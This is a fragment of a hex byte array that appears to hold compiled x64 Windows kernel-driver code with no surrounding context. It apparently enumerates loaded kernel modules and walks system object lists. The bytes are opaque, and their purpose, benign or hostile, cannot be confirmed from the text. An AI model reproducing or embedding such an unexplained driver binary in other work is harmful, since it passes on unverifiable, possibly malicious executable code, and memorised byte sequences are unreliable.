0x83, 0xC3, 0x50, 0x48, 0x3B, 0x1D, 0x3E, 0x8E, 0x00, 0x00, 0x76, 0xC0,
0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48,
0x8B, 0xF9, 0x33, 0xC0, 0x48, 0x8D, 0x1D, 0x05, 0x8E, 0x00, 0x00, 0x48,
0x8D, 0x35, 0xFE, 0x8D, 0x00, 0x00, 0x48, 0x3B, 0xDE, 0x73, 0x4E, 0x83,
0x3B, 0x50, 0x75, 0x44, 0x48, 0x8B, 0x43, 0x38, 0x48, 0x89, 0x1D, 0xF1,
0x8D, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x18, 0x4C, 0x8B, 0x05, 0x45,
0xA1, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0xE6, 0x62, 0x00, 0x00, 0x4C, 0x8B,
0xCB, 0x48, 0x8B, 0xD7, 0xFF, 0xD0, 0xEB, 0x12, 0x48, 0x8B, 0x15, 0x2D,
0xA1, 0x00, 0x00, 0x4C, 0x8B, 0xC3, 0x48, 0x8B, 0xCF, 0xE8, 0xCA, 0x62,
0x00, 0x00, 0x85, 0xC0, 0x78, 0x0B, 0x48, 0x83, 0xC3, 0x50, 0xEB, 0xB2,
0xB8, 0x04, 0x00, 0x00, 0xC0, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B,
0x74, 0x24, 0x38, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24,
0x08, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8D, 0x05, 0x9F, 0x8D, 0x00,
0x00, 0x48, 0x8D, 0x0D, 0x98, 0x8D, 0x00, 0x00, 0x48, 0x3B, 0xC1, 0x73,
0x3C, 0x48, 0x2B, 0xC8, 0x48, 0xB8, 0xCD, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0x48, 0x8D, 0x1D, 0x9F, 0x8D, 0x00, 0x00, 0x48, 0xFF, 0xC9,
0x48, 0xF7, 0xE1, 0x48, 0x8B, 0xFA, 0x48, 0xC1, 0xEF, 0x05, 0x48, 0xFF,
0xC7, 0x48, 0x8B, 0x03, 0x48, 0x85, 0xC0, 0x74, 0x06, 0xFF, 0xD0, 0x48,
0x89, 0x43, 0xF8, 0x48, 0x83, 0xC3, 0x28, 0x48, 0x83, 0xEF, 0x01, 0x75,
0xE8, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x18, 0x48, 0x89, 0x74, 0x24, 0x20, 0x57, 0x48,
0x83, 0xEC, 0x20, 0x48, 0x8D, 0x0D, 0xCA, 0x66, 0x00, 0x00, 0xE9, 0xCE,
0x0B, 0x13, 0x00, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x48,
0x8B, 0x74, 0x24, 0x48, 0x8A, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48,
0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0x40, 0x53, 0x48, 0x83,
0xEC, 0x20, 0x48, 0x83, 0x25, 0xE2, 0x8C, 0x00, 0x00, 0x00, 0x48, 0x8D,
0x0D, 0xEB, 0x8C, 0x00, 0x00, 0x83, 0x25, 0xDC, 0x8C, 0x00, 0x00, 0x00,
0xBA, 0x01, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC0, 0x89, 0x15, 0xBE, 0x8C,
0x00, 0x00, 0xFF, 0x15, 0x00, 0x6F, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0x61,
0x66, 0x00, 0x00, 0xE9, 0xC4, 0x0B, 0x13, 0x00, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0x8A, 0xC3, 0x48, 0x83, 0xC4, 0x20, 0x5B, 0xC3, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x20, 0xB3, 0x01,
0xE8, 0xE7, 0x0E, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0x6C, 0x8C, 0x00, 0x00,
0x8B, 0xF8, 0xFF, 0x15, 0xCC, 0x6E, 0x00, 0x00, 0x8B, 0x0D, 0x96, 0x8C,
0x00, 0x00, 0x85, 0xC9, 0x74, 0x30, 0x8B, 0xC7, 0x2B, 0xC1, 0xB9, 0x40,
0x1F, 0x00, 0x00, 0x3B, 0xC1, 0x72, 0x1C, 0x8B, 0x05, 0x83, 0x8C, 0x00,
0x00, 0x85, 0xC0, 0x75, 0x08, 0x89, 0x3D, 0x79, 0x8C, 0x00, 0x00, 0xEB,
0x11, 0x2B, 0xF8, 0x3B, 0xF9, 0x72, 0x0B, 0x32, 0xDB, 0xEB, 0x07, 0x83,
0x25, 0x66, 0x8C, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0x23, 0x8C, 0x00,
0x00, 0xFF, 0x15, 0x7D, 0x6E, 0x00, 0x00, 0x8A, 0xC3, 0x48, 0x8B, 0x5C,
0x24, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0x48, 0x83, 0xEC, 0x28,
0x48, 0x8D, 0x0D, 0x55, 0x65, 0x00, 0x00, 0xE9, 0x48, 0x0B, 0x13, 0x00,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x32, 0xC0, 0x48, 0x83, 0xC4, 0x28,
0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x83, 0xEC, 0x28, 0x48, 0x8D, 0x0D, 0xB5,
0x8B, 0x00, 0x00, 0xFF, 0x15, 0x17, 0x6E, 0x00, 0x00, 0x48, 0x8D, 0x0D,
0x18, 0x65, 0x00, 0x00, 0xE9, 0x47, 0x0B, 0x13, 0x00, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0xCC, 0xCC, 0xCC, 0x48, 0x8D, 0x0D, 0x8A, 0x8B, 0x00, 0x00, 0x48, 0x83,
0xC4, 0x28, 0x48, 0xFF, 0x25, 0xDF, 0x6D, 0x00, 0x00, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x41,
0x54, 0x41, 0x56, 0x48, 0x81, 0xEC, 0xC0, 0x03, 0x00, 0x00, 0x48, 0x8B,
0xFA, 0x4C, 0x8B, 0xF1, 0x48, 0x83, 0x64, 0x24, 0x50, 0x00, 0xFF, 0x15,
0x84, 0x6B, 0x00, 0x00, 0x84, 0xC0, 0x75, 0x0A, 0xB8, 0x01, 0x00, 0x00,
0xC0, 0xE9, 0x86, 0x02, 0x00, 0x00, 0x49, 0x8B, 0xD6, 0x48, 0x8D, 0x4C,
0x24, 0x60, 0xFF, 0x15, 0xF0, 0x6A, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x70,
0x30, 0x00, 0x00, 0x00, 0x48, 0x83, 0x64, 0x24, 0x78, 0x00, 0xC7, 0x84,
0x24, 0x88, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x44,
0x24, 0x60, 0x48, 0x89, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x0F, 0x57,
0xC0, 0xF3, 0x0F, 0x7F, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00, 0x4C, 0x8D,
0x44, 0x24, 0x70, 0xBA, 0x03, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24,
0x50, 0xFF, 0x15, 0x29, 0x6B, 0x00, 0x00, 0x89, 0x44, 0x24, 0x40, 0x85,
0xC0, 0x0F, 0x85, 0x25, 0x02, 0x00, 0x00, 0x83, 0xA4, 0x24, 0xF8, 0x03,
0x00, 0x00, 0x00, 0x83, 0xA4, 0x24, 0xF0, 0x03, 0x00, 0x00, 0x00, 0x48,
0x83, 0x64, 0x24, 0x48, 0x00, 0x48, 0x83, 0x64, 0x24, 0x58, 0x00, 0x41,
0xBC, 0x04, 0x01, 0x00, 0x00, 0x4D, 0x8B, 0xC4, 0x33, 0xD2, 0x48, 0x8D,
0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0xE8, 0x11, 0x63, 0x00, 0x00, 0x48,
0x8D, 0x84, 0x24, 0xF0, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30,
0x48, 0x8D, 0x84, 0x24, 0xF8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24,
0x28, 0xC6, 0x44, 0x24, 0x20, 0x00, 0x41, 0xB1, 0x01, 0x45, 0x8B, 0xC4,
0x48, 0x8D, 0x94, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24,
0x50, 0xFF, 0x15, 0xB9, 0x6A, 0x00, 0x00, 0x8B, 0xD8, 0x89, 0x44, 0x24,
0x40, 0x85, 0xC0, 0x74, 0x10, 0x48, 0x8B, 0x4C, 0x24, 0x50, 0xFF, 0x15,
0x8C, 0x6A, 0x00, 0x00, 0xE9, 0x9D, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x8C,
0x24, 0xA0, 0x00, 0x00, 0x00, 0xFF, 0x15, 0x81, 0x6A, 0x00, 0x00, 0x84,
0xC0, 0x0F, 0x84, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0xA8,
0x00, 0x00, 0x00, 0xFF, 0x15, 0x6B, 0x6A, 0x00, 0x00, 0x84, 0xC0, 0x0F,
0x84, 0x92, 0x00, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02, 0x00,
0x00, 0x48, 0x8D, 0x8C, 0x24, 0xB0, 0x01, 0x00, 0x00, 0xE8, 0x7E, 0x62,
0x00, 0x00, 0x4D, 0x8B, 0xC6, 0x49, 0x8B, 0xD4, 0x48, 0x8D, 0x8C, 0x24,
0xB0, 0x01, 0x00, 0x00, 0xE8, 0x6F, 0x09, 0x00, 0x00, 0x4C, 0x8D, 0x05,
0xC4, 0x63, 0x00, 0x00, 0x49, 0x8B, 0xD4, 0x48, 0x8D, 0x8C, 0x24, 0xB0,
0x01, 0x00, 0x00, 0xE8, 0x88, 0x08, 0x00, 0x00, 0x4C, 0x8B, 0x84, 0x24,
0xA8, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD4, 0x48, 0x8D, 0x8C, 0x24, 0xB0,
0x01, 0x00, 0x00, 0xE8, 0x70, 0x08, 0x00, 0x00, 0x48, 0x8D, 0x94, 0x24,
0xB0, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0xFF, 0x15, 0x81,
0x69, 0x00, 0x00, 0x48, 0x8D, 0x15, 0x92, 0x63, 0x00, 0x00, 0x48, 0x8B,
0x8C, 0x24, 0xB8, 0x00, 0x00, 0x00, 0xE8, 0x15, 0x5E, 0x00, 0x00, 0x85,
0xC0, 0x75, 0x15, 0x48, 0x8B, 0xD7, 0x48, 0x8D, 0x8C, 0x24, 0xB0, 0x01,
0x00, 0x00, 0xE8, 0x25, 0xFE, 0xFF, 0xFF, 0xE9, 0xD9, 0xFE, 0xFF, 0xFF,
0x48, 0x8D, 0x15, 0x85, 0x63, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0xB8,
0x00, 0x00, 0x00, 0xE8, 0xE8, 0x5D, 0x00, 0x00, 0x85, 0xC0, 0x75, 0xE3,
0x4C, 0x8D, 0x4C, 0x24, 0x58, 0x4C, 0x8D, 0x44, 0x24, 0x48, 0x8D, 0x50,
0x01, 0x48, 0x8D, 0x4C, 0x24, 0x60, 0xFF, 0x15, 0x8C, 0x69, 0x00, 0x00,
0x89, 0x44, 0x24, 0x40, 0x85, 0xC0, 0x75, 0xC3, 0x48, 0x8B, 0x4C, 0x24,
0x58, 0xE8, 0x66, 0x03, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x5F, 0x48, 0x8B,
0x44, 0x24, 0x58, 0x48, 0x8B, 0x70, 0x08, 0x48, 0x8B, 0xCE, 0xFF, 0x15,
0x74, 0x69, 0x00, 0x00, 0x3C, 0x01, 0x75, 0x49, 0x48, 0x8B, 0xD6, 0x48,
0x8B, 0xCF, 0xE8, 0xE1, 0x02, 0x00, 0x00, 0x84, 0xC0, 0x75, 0x3A, 0xBA,
0x30, 0x04, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0xE4, 0x68, 0x00, 0x00,
0x48, 0x8B, 0xD8, 0x48, 0x8D, 0x50, 0x10, 0x48, 0x8B, 0xCE, 0xE8, 0xC9,
0x06, 0x00, 0x00, 0x48, 0x8B, 0x07, 0x48, 0x39, 0x78, 0x08, 0x74, 0x07,
0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD, 0x29, 0x48, 0x89, 0x03, 0x48, 0x89,
0x7B, 0x08, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x1F, 0x48, 0x8B, 0x4C,
0x24, 0x48, 0xFF, 0x15, 0x1C, 0x69, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84,
0x43, 0xFF, 0xFF, 0xFF, 0x48, 0x8B, 0x4C, 0x24, 0x48, 0xFF, 0x15, 0x31,
0x6B, 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00,
0xE9, 0x2A, 0xFF, 0xFF, 0xFF, 0xBB, 0x01, 0x00, 0x00, 0xC0, 0x89, 0x5C,
0x24, 0x40, 0x8B, 0xC3, 0x4C, 0x8D, 0x9C, 0x24, 0xC0, 0x03, 0x00, 0x00,
0x49, 0x8B, 0x5B, 0x20, 0x49, 0x8B, 0x73, 0x28, 0x49, 0x8B, 0xE3, 0x41,
0x5E, 0x41, 0x5C, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x8B, 0xC4, 0x53,
0x57, 0x41, 0x56, 0x48, 0x81, 0xEC, 0xB0, 0x03, 0x00, 0x00, 0x48, 0x8B,
0xF9, 0x48, 0x83, 0x64, 0x24, 0x48, 0x00, 0x83, 0x60, 0x10, 0x00, 0x83,
0x60, 0x18, 0x00, 0x48, 0x8D, 0x15, 0x7E, 0x62, 0x00, 0x00, 0x48, 0x8D,
0x4C, 0x24, 0x50, 0xFF, 0x15, 0x2B, 0x68, 0x00, 0x00, 0xC7, 0x44, 0x24,
0x60, 0x30, 0x00, 0x00, 0x00, 0x48, 0x83, 0x64, 0x24, 0x68, 0x00, 0xC7,
0x44, 0x24, 0x78, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x44, 0x24, 0x50,
0x48, 0x89, 0x44, 0x24, 0x70, 0x0F, 0x57, 0xC0, 0xF3, 0x0F, 0x7F, 0x84,
0x24, 0x80, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x44, 0x24, 0x60, 0xBA, 0x03,
0x00, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x48, 0xFF, 0x15, 0x6A, 0x68,
0x00, 0x00, 0x89, 0x44, 0x24, 0x40, 0x85, 0xC0, 0x74, 0x0A, 0xB8, 0x01,
0x00, 0x00, 0xC0, 0xE9, 0xBD, 0x01, 0x00, 0x00, 0x41, 0xBE, 0x04, 0x01,
0x00, 0x00, 0x4D, 0x8B, 0xC6, 0x33, 0xD2, 0x48, 0x8D, 0x8C, 0x24, 0x90,
0x00, 0x00, 0x00, 0xE8, 0x68, 0x60, 0x00, 0x00, 0x48, 0x8D, 0x84, 0x24,
0xD8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8D, 0x84,
0x24, 0xE0, 0x03, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x28, 0xC6, 0x44,
0x24, 0x20, 0x00, 0x41, 0xB1, 0x01, 0x45, 0x8B, 0xC6, 0x48, 0x8D, 0x94,
0x24, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x48, 0xFF, 0x15,
0x10, 0x68, 0x00, 0x00, 0x8B, 0xD8, 0x89, 0x44, 0x24, 0x40, 0x85, 0xC0,
0x74, 0x10, 0x48, 0x8B, 0x4C, 0x24, 0x48, 0xFF, 0x15, 0xE3, 0x67, 0x00,
0x00, 0xE9, 0x51, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0x90, 0x00,
0x00, 0x00, 0xFF, 0x15, 0xD8, 0x67, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84,
0x2D, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x8C, 0x24, 0x98, 0x00, 0x00, 0x00,
0xFF, 0x15, 0xC2, 0x67, 0x00, 0x00, 0x84, 0xC0, 0x0F, 0x84, 0x17, 0x01,
0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8D,
0x8C, 0x24, 0xA0, 0x01, 0x00, 0x00, 0xE8, 0xD5, 0x5F, 0x00, 0x00, 0x4C,
0x8D, 0x05, 0x7E, 0x61, 0x00, 0x00, 0x49, 0x8B, 0xD6, 0x48, 0x8D, 0x8C,
0x24, 0xA0, 0x01, 0x00, 0x00, 0xE8, 0xC2, 0x06, 0x00, 0x00, 0x4C, 0x8B,
0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x49, 0x8B, 0xD6, 0x48, 0x8D, 0x8C,
0x24, 0xA0, 0x01, 0x00, 0x00, 0xE8, 0xDA, 0x05, 0x00, 0x00, 0x48, 0x8D,
0x94, 0x24, 0xA0, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x50, 0xFF,
0x15, 0xEB, 0x66, 0x00, 0x00, 0x48, 0x83, 0xA4, 0x24, 0xE8, 0x03, 0x00,
0x00, 0x00, 0x48, 0x8D, 0x84, 0x24, 0xE8, 0x03, 0x00, 0x00, 0x48, 0x89,
0x44, 0x24, 0x38, 0x48, 0x83, 0x64, 0x24, 0x30, 0x00, 0xC6, 0x44, 0x24,
0x28, 0x00, 0x48, 0x8B, 0x05, 0x73, 0x67, 0x00, 0x00, 0x48, 0x8B, 0x08,
0x48, 0x89, 0x4C, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x45, 0x33, 0xC0, 0x41,
0x8D, 0x51, 0x40, 0x48, 0x8D, 0x4C, 0x24, 0x50, 0xFF, 0x15, 0x36, 0x67,
0x00, 0x00, 0x89, 0x44, 0x24, 0x40, 0x85, 0xC0, 0x75, 0x73, 0x48, 0x8B,
0x8C, 0x24, 0xE8, 0x03, 0x00, 0x00, 0xFF, 0x15, 0x08, 0x67, 0x00, 0x00,
0x3C, 0x01, 0x75, 0x53, 0x48, 0x8B, 0x94, 0x24, 0xE8, 0x03, 0x00, 0x00,
0x48, 0x8B, 0xCF, 0xE8, 0x70, 0x00, 0x00, 0x00, 0x84, 0xC0, 0x75, 0x3F,
0xBA, 0x30, 0x04, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x73, 0x66, 0x00,
0x00, 0x48, 0x8B, 0xD8, 0x48, 0x8D, 0x50, 0x10, 0x48, 0x8B, 0x8C, 0x24,
0xE8, 0x03, 0x00, 0x00, 0xE8, 0x53, 0x04, 0x00, 0x00, 0x48, 0x8B, 0x07,
0x48, 0x39, 0x78, 0x08, 0x74, 0x07, 0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD,
0x29, 0x48, 0x89, 0x03, 0x48, 0x89, 0x7B, 0x08, 0x48, 0x89, 0x58, 0x08,
0x48, 0x89, 0x1F, 0x48, 0x8B, 0x8C, 0x24, 0xE8, 0x03, 0x00, 0x00, 0xFF,
0x15, 0xCB, 0x68, 0x00, 0x00, 0xE9, 0x54, 0xFE, 0xFF, 0xFF, 0xBB, 0x01,
0x00, 0x00, 0xC0, 0x89, 0x5C, 0x24, 0x40, 0x8B, 0xC3, 0x48, 0x81, 0xC4,
0xB0, 0x03, 0x00, 0x00, 0x41, 0x5E, 0x5F, 0x5B, 0xC3, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89,
0x74, 0x24, 0x18, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0x19, 0x40,
0x32, 0xFF, 0x48, 0x8B, 0xEA, 0x48, 0x8B, 0xF1, 0x48, 0x3B, 0xD9, 0x74,
0x21, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x56, 0x66, 0x00, 0x00, 0x40, 0x3A,
0xC7, 0x74, 0x13, 0x48, 0x39, 0x6B, 0x10, 0x74, 0x0A, 0x48, 0x8B, 0x1B,
0x48, 0x3B, 0xDE, 0x75, 0xE4, 0xEB, 0x03, 0x40, 0xB7, 0x01, 0x48, 0x8B,
0x5C, 0x24, 0x30, 0x40, 0x8A, 0xC7, 0x48, 0x8B, 0x6C, 0x24, 0x38, 0x48,
0x8B, 0x74, 0x24, 0x40, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x30, 0x48, 0x8B,
0xF9, 0x32, 0xDB, 0xFF, 0x15, 0x0F, 0x66, 0x00, 0x00, 0x3A, 0xC3, 0x74,
0x1D, 0x48, 0x8B, 0x4F, 0x08, 0xFF, 0x15, 0x01, 0x66, 0x00, 0x00, 0x0F,
0xB6, 0xCB, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x3A, 0xC3, 0x0F, 0x45, 0xCA,
0x8A, 0xD9, 0x88, 0x4C, 0x24, 0x20, 0xEB, 0x06, 0x32, 0xDB, 0x88, 0x5C,
0x24, 0x20, 0x8A, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48, 0x83, 0xC4,
0x30, 0x5F, 0xC3, 0xCC, 0x48, 0x83, 0xEC, 0x28, 0x48, 0x8B, 0xC2, 0x49,
0x8B, 0xD0, 0x85, 0xC9, 0x48, 0x8B, 0xC8, 0x75, 0x07, 0xE8, 0x12, 0x00,
0x00, 0x00, 0xEB, 0x09, 0xE8, 0xBF, 0x01, 0x00, 0x00, 0xEB, 0x02, 0x32,
0xC0, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x56, 0x57, 0x41, 0x54, 0x41,
0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x40, 0x33, 0xFF, 0x4C, 0x8D, 0x48,
0x18, 0x4C, 0x8B, 0xF2, 0x89, 0x78, 0x18, 0x4C, 0x8B, 0xF9, 0x48, 0x8D,
0x50, 0x18, 0x45, 0x33, 0xC0, 0x8D, 0x5F, 0x0B, 0x8B, 0xCB, 0xE8, 0xAF,
0x59, 0x00, 0x00, 0x3D, 0x04, 0x00, 0x00, 0xC0, 0x75, 0x3B, 0x8B, 0x94,
0x24, 0x80, 0x00, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0xF3, 0x64, 0x00,
0x00, 0x48, 0x8B, 0xF0, 0x48, 0x85, 0xC0, 0x74, 0x24, 0x44, 0x8B, 0x84,
0x24, 0x80, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x48, 0x8B, 0xD0, 0x8B,
0xCB, 0xE8, 0x7C, 0x59, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x24, 0x33, 0xD2,
0x48, 0x8B, 0xCE, 0xFF, 0x15, 0xD7, 0x64, 0x00, 0x00, 0x32, 0xC0, 0x48,
0x8B, 0x5C, 0x24, 0x70, 0x48, 0x8B, 0x6C, 0x24, 0x78, 0x48, 0x83, 0xC4,
0x40, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5C, 0x5F, 0x5E, 0xC3, 0x44, 0x8B,
0xC7, 0x39, 0x3E, 0x76, 0x26, 0x41, 0x8B, 0xC0, 0x48, 0x69, 0xD0, 0x28,
0x01, 0x00, 0x00, 0x48, 0x8B, 0x05, 0x36, 0x65, 0x00, 0x00, 0x48, 0x8B,
0x08, 0x48, 0x39, 0x4C, 0x32, 0x18, 0x76, 0x03, 0x41, 0xFF, 0x06, 0x41,
0xFF, 0xC0, 0x44, 0x3B, 0x06, 0x72, 0xDA, 0x41, 0x8B, 0x06, 0x85, 0xC0,
0x74, 0xB3, 0x48, 0x69, 0xD0, 0x20, 0x04, 0x00, 0x00, 0x33, 0xC9, 0xFF,
0x15, 0x6B, 0x64, 0x00, 0x00, 0x49, 0x89, 0x07, 0x48, 0x85, 0xC0, 0x74,
0x9C, 0x41, 0x8B, 0x0E, 0x33, 0xD2, 0x4C, 0x69, 0xC1, 0x20, 0x04, 0x00,
0x00, 0x48, 0x8B, 0xC8, 0xE8, 0xEF, 0x5C, 0x00, 0x00, 0x8B, 0xEF, 0x39,
0x3E, 0x0F, 0x86, 0xA6, 0x00, 0x00, 0x00, 0x41, 0xBC, 0x03, 0x01, 0x00,
0x00, 0x8B, 0xC5, 0x48, 0x69, 0xD0, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8B,
0x05, 0xCF, 0x64, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x32, 0x18, 0x48, 0x3B,
0x08, 0x76, 0x7C, 0x41, 0x3B, 0x3E, 0x73, 0x75, 0x8B, 0xC7, 0x48, 0x69,
0xD8, 0x20, 0x04, 0x00, 0x00, 0x49, 0x8B, 0x07, 0x48, 0x89, 0x4C, 0x03,
0x08, 0x8B, 0x44, 0x32, 0x20, 0x48, 0x83, 0xC2, 0x30, 0x49, 0x8B, 0x0F,
0x48, 0x03, 0xD6, 0x89, 0x44, 0x0B, 0x10, 0x48, 0x8D, 0x4C, 0x24, 0x30,
0xFF, 0x15, 0x3A, 0x64, 0x00, 0x00, 0x41, 0xB0, 0x01, 0x48, 0x8D, 0x54,
0x24, 0x30, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF, 0x15, 0x2F, 0x64, 0x00,
0x00, 0x0F, 0xB7, 0x44, 0x24, 0x20, 0x45, 0x8B, 0xC4, 0x66, 0x44, 0x3B,
0x64, 0x24, 0x20, 0x48, 0x8B, 0x54, 0x24, 0x28, 0x44, 0x0F, 0x43, 0xC0,
0x49, 0x8B, 0x07, 0x48, 0x8D, 0x88, 0x14, 0x01, 0x00, 0x00, 0x48, 0x03,
0xCB, 0xE8, 0x16, 0x59, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF,
0x15, 0x03, 0x64, 0x00, 0x00, 0xFF, 0xC7, 0xFF, 0xC5, 0x3B, 0x2E, 0x0F,
0x82, 0x60, 0xFF, 0xFF, 0xFF, 0x33, 0xD2, 0x48, 0x8B, 0xCE, 0xFF, 0x15,
0xA4, 0x63, 0x00, 0x00, 0xB0, 0x01, 0xE9, 0xC8, 0xFE, 0xFF, 0xFF, 0xCC,
0x4C, 0x8B, 0xDC, 0x49, 0x89, 0x5B, 0x08, 0x49, 0x89, 0x6B, 0x10, 0x49,
0x89, 0x73, 0x18, 0x49, 0x89, 0x7B, 0x20, 0x41, 0x56, 0x48, 0x83, 0xEC,
0x30, 0x49, 0x8D, 0x43, 0xE8, 0x48, 0x8B, 0xF2, 0x49, 0x89, 0x43, 0xF0,
0x49, 0x8D, 0x53, 0xE8, 0x49, 0x8D, 0x43, 0xE8, 0x4C, 0x8B, 0xF1, 0x48,
